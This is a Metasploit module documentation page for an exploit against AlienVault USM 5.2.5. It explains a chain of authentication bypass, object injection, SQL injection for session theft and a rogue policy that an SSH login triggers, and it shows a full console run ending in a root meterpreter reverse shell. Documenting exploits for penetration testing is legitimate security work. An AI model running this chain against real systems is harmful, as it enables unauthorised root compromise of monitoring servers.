adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
a8697cdffc49249ded505d5bb528209fc36ab6c5
metasploit-gs/documentation/modules/exploit/linux/http/alienvault_exec.md
T
h00die 4cc85ecb75 adress a spelling problem
2019-10-05 14:22:18 -04:00

59 lines
2.6 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module exploits object injection, authentication bypass and ip spoofing vulnerabities all together. Unauthenticated users can execute arbitrary commands under the context of the root user.
By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability
which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue
action and policy that enables to execute operating system commands by using captured session token. As a final step,
SSH login attempt with a invalid credentials can trigger a created rogue policy which triggers an action that executes
operating system command with root user privileges.
This module was tested against AlienVault USM 5.2.5.
**Vulnerable Application Installation Steps**
Major version of older releases can be found at following URL.
[http://downloads.eu.alienvault.com/c/download](http://downloads.eu.alienvault.com/c/download)
You can download file named as AlienVault-USM_trial_5.2.5.zip which contains a OVA file.
In order to complete installation phase, you have to apply [https://www.alienvault.com/try-it-free](https://www.alienvault.com/try-it-free) .
Once alienvault sales team validate your information, you will be able to complete the installation with your e-mail address.
## Verification Steps
A successful check of the exploit will look like this:
```
msf > use exploit/linux/http/alienvault_exec
msf exploit(alienvault_exec) > set RHOST 12.0.0.137
RHOST => 12.0.0.137
msf exploit(alienvault_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(alienvault_exec) > check
[+] 12.0.0.137:443 The target is vulnerable.
msf exploit(alienvault_exec) > exploit
[*] Started reverse TCP handler on 12.0.0.1:4445
[*] Hijacking administrator session
[+] Admin session token : PHPSESSID=2gbhp8j5f2af0vu5es5t3083q4
[*] Creating rogue action
[+] Action created: aWbhnZFHqYbUbNW
[*] Retrieving rogue action id
[+] Corresponding Action ID found: D62A1D4A6D3AEEA65F99B606B02197A1
[*] Retrieving policy ctx and group values
[+] CTX Value found: 5E22D6A9E79211E6B8E4000C29F647D7
[+] GROUP Value found: 00000000000000000000000000000000
[*] Creating a policy that uses our rogue action
[+] Policy created: ASdKHQOZVONGzfU
[*] Activating the policy
[+] Rogue policy activated
[*] Triggering the policy by performing SSH login attempt
[+] SSH - Failed authentication. That means our policy and action will be trigged..!
[*] Sending stage (38500 bytes) to 12.0.0.137
[*] Meterpreter session 6 opened (12.0.0.1:4445 -> 12.0.0.137:51674) at 2017-01-31 14:13:49 +0300
meterpreter > getuid
Server username: root
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink